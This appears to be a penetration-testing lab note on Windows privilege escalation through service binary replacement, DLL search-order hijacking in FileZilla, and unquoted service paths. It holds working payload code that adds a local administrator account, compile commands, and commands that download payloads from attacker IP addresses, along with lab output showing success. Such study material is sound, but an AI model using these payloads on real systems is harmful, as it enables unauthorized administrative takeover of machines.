A Windows service is a background process managed by the Service Control Manager. Services can be controlled using services snap-in (services.msc), PowerShell, orsc.exe (command-line tool). They run under specific built-in accounts:
LocalSystem: High privileges (includes SYSTEM and Administrator SIDs)
Network Service: Limited privileges with network access
Local Service: Limited privileges without network access
Services can also run under custom user accounts (local or domain users).
Service Binary Hijacking
For automated Service Binary Hijacking see .
Every Windows service has an associated binary that runs when the service starts, and if its permissions are misconfigured, a low-privileged user may be able to replace it with a malicious file. For example, a developer might install a service but fail to properly restrict access, allowing any user to modify the binary. An attacker could exploit this by replacing the binary with their own payload, and then triggering its execution by restarting the service or rebooting the system—causing the malicious code to run with elevated privileges such as LocalSystem.
To list Windows services and their binaries we can use the GUI app services.msc, or the Get-Service and Get-CimInstance cmdlets.
# Filter running services and their executable paths
> Get-CimInstance -ClassName win32_service | Select Name, State, PathName | Where-Object { $_.State -eq "Running" }
Name State PathName
---- ----- --------
Apache2.4 Running "C:\xampp\apache\bin\httpd.exe" -k runservice
Appinfo Running C:\Windows\system32\svchost.exe -k netsvcs -p
AppXSvc Running C:\Windows\system32\svchost.exe -k wsappx -p
mysql Running C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql
Network logons (e.g., WinRM, bind shells) may fail when querying services as a non-admin user, while interactive logins (e.g., RDP) work without permission issues.
From the list above, the binaries located in the C:\xampp instead of the C:\Windows\System32 directory (apache2.4 and mysql) stand out because this means that these services are user-installed and are, therefore, susceptible to permission misconfigurations. We can enumerate their permissions using icacls or Get-ACL .
We will create a malicious binary to replace the original mysqld.exe.
addUser.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
$ x86_64-w64-mingw32-gcc addUser.c -o addUser.exe
# Transfer the malicious binary to the target
iwr -uri http://192.168.45.231/addUser.exe -Outfile mysqld.exe
# Backup the original binary
> move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
# Replace the original binary
> move .\addUser.exe C:\xampp\mysql\bin\mysqld.exe
We can stop and then start the service:
# Check the service's status
> Get-Service -Name 'mysql'
Status Name DisplayName
------ ---- -----------
Running mysql mysql
# Stop the service
> net stop mysql
> Stop-Service -Name 'mysql' -Force
# Start the service
> Start-Service -Name 'mysql'
Or restart it in one step (sometimes one approach might work while the other not):
# Restart the service directly
> Restart-Service -Name 'mysql' -Force
If the user does not have to restart the service but has the SeShutDownPrivilege assigned and the StartMode of the service is set to Auto, we can just reboot the system.
> net stop mysql
System error 5 has occurred.
Access is denied.
> Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
Name StartMode
---- ---------
mysql Auto
# The Disabled state only indicates if the privilege is currently enabled for the running process.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeSecurityPrivilege Manage auditing and security log Disabled
SeShutdownPrivilege Shut down the system Disabled
<SNIP>
# 'r' -> reboot, 't 0' -> in zero seconds
> shutdown /r /t 0
To restore the original state of the service, we have to delete our binary mysqld.exe, restore the backed up original binary, and restart the system.
We can also get a reverse shell by replacing the binary with the following.
If binary service hijacking isn't possible due to permission restrictions, DLL hijacking, a more stealthier method, can be used. DLLs are essential components that provide shared functionality to Windows programs. By replacing a DLL that a service depends on, malicious code can be injected while maintaining the service's functionality.
DLLs are called Shared Objects on Unix.
When a program needs a DLL, Windows follows a predefined search order to locate it. To improve security, Microsoft introduced safe DLL search mode, which prioritizes system directories to prevent unauthorized DLL loading. The standard search order is:
1. The directory from which the application loaded.
2. The System directory.
3. The 16-bit System directory.
4. The Windows directory.
5. The current directory.
6. The directories that are listed in the PATH environment variable.
However, if a program looks for a missing DLL (due to installation issues or updates), a malicious DLL can be placed with the same name in a directory higher in the search order, a technique known as DLL search order hijacking.
# List available services
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
displayname
-----------
FileZilla 3.63.1
<SNIP>
# Write a file to the binary's directory
> echo "test" > 'C:\FileZilla\FileZilla FTP Client\test.txt'
# List the file's contents
> type 'C:\FileZilla\FileZilla FTP Client\test.txt'
test
The typical process of checking which DLLs are used by an application is via the Process Monitor tool, aka as procmon. Once we have a list of DLLs used by the service binary, we can check their permissions and if they can be replaced with a malicious DLL.
To start the Process Monitor we need elevated privileges. If we don't, we can copy the service binary to a local machine instead.
After filtering the results, we can click Clear (red bin icon) and start the process we are interested in. Since we are interested specifically in the TextShaping.dll we can create another filter targeting that.
Based on the above screenshot, the binary tries to load the TextShaping.dll from C:\Filezilla\Filezilla FTP Client\ and it can't find it. It then proceeds to search and find it from C:\Windows\System32\.
Each DLL can have an optional entry point function named DllMain, which is executed when processes or threads attach the DLL. This function generally contains four cases named:
DLL_PROCESS_ATTACH
DLL_THREAD_ATTACH
DLL_THREAD_DETACH
DLL_PROCESS_DETACH
These cases handle situations when the DLL is loaded or unloaded by a process or thread. They are commonly used to perform initialization tasks for the DLL or tasks related to exiting the DLL. If a DLL doesn't have a DllMain entry point function, it only provides resources. We are interested in the DLL_PROCESS_ATTACH section of the code, since this is used when a process is loading the DLL.
dll_hijacking.cpp
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
# Cross-compile the script on the attacking machine
$ x86_64-w64-mingw32-gcc dll_hijacking.cpp --shared -o TextShaping.dll
# Transfer the malicious DLL to the target host
iwr -uri http://192.168.45.236/TextShaping.dll -OutFile 'C:\FileZilla\FileZilla FTP Client\TextShaping.dll'
In order for the DLL hijacking to trigger the FileZilla FTP Client needs to be started, however, it is important to keep in mind that the privileges the DLL will run with depend on the privileges used to start the application. If we were to start the FTP client as a low-privileged user, then we would not have the required privileges for our payload to work, i.e., to add a new user to the system and place them in the Administrators group.
Some binaries need to be started as a service in order to function properly:
# Create a new service pointing to the binary
sc.exe create "Filezilla" binpath= "C:\Users\x7331\Desktop\filezilla.exe"
# Restart the service
Restart-Service Filezilla
Unquoted Service Paths
Each Windows service maps to an executable file.
When a service starts, a process is created via the CreateProcess function.
The first parameter of this function, IpApplicationName, specifies the name and, optionally, the executable path. If the latter is an unquoted string that contains spaces, it can be used as a privilege escalation vector due to how Windows interprets the path.
For example, C:\Program Files\My Program\My Service\service.exe will be interpreted as:
We can exploit this by creating a malicious executable in any of the paths before the original one. This will result in the former executing with the same privileges that the service starts with, typically, LocalSystem.
Example
PS C:\Users\steve> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Name State PathName
---- ----- --------
...
GammaService Stopped C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
...
# a more efficient cmd alternative
# /i -> case insensitive
# /v -> don't match (outside the Windows dir for permission issues and without quotes)
C:\Users\steve> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Name PathName
...
GammaService C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
PS C:\Users\steve> Start-Service GammaService
WARNING: Waiting for service 'GammaService (GammaService)' to start...
PS C:\Users\steve> Stop-Service GammaService
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
# cross-compile the script on the attacking machine
$ x86_64-w64-mingw32-gcc Current.c --shared -o Current.exe
PS C:\Users\steve> Start-Service GammaService
Start-Service : Service 'GammaService (GammaService)' cannot be started due to the following
error: Cannot start service GammaService on computer '.'.
At line:1 char:1
+ Start-Service GammaService
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OpenError: (System.ServiceProcess.ServiceController:ServiceControl
ler) [Start-Service], ServiceCommandException
+ FullyQualifiedErrorId : CouldNotStartService,Microsoft.PowerShell.Commands.StartServiceCom
mand
PS C:\Users\steve> net user
User accounts for \\CLIENTWK220
-------------------------------------------------------------------------------
Administrator BackupAdmin dave
dave2 # user created!
<SNIP>
PS C:\Users\steve> Get-LocalGroupMember administrators
ObjectClass Name PrincipalSource
----------- ---- ---------------
User CLIENTWK220\Administrator Local
User CLIENTWK220\BackupAdmin Local
User CLIENTWK220\dave2 Local # user added to the admin's group!
User CLIENTWK220\daveadmin Local
User CLIENTWK220\offsec Local
Filezilla 3.63.1 has a related to the TextShaping.dll file. We first need to check if we have write access to the DLL's location.
For automated enumeration and exploitation of this vector, see .
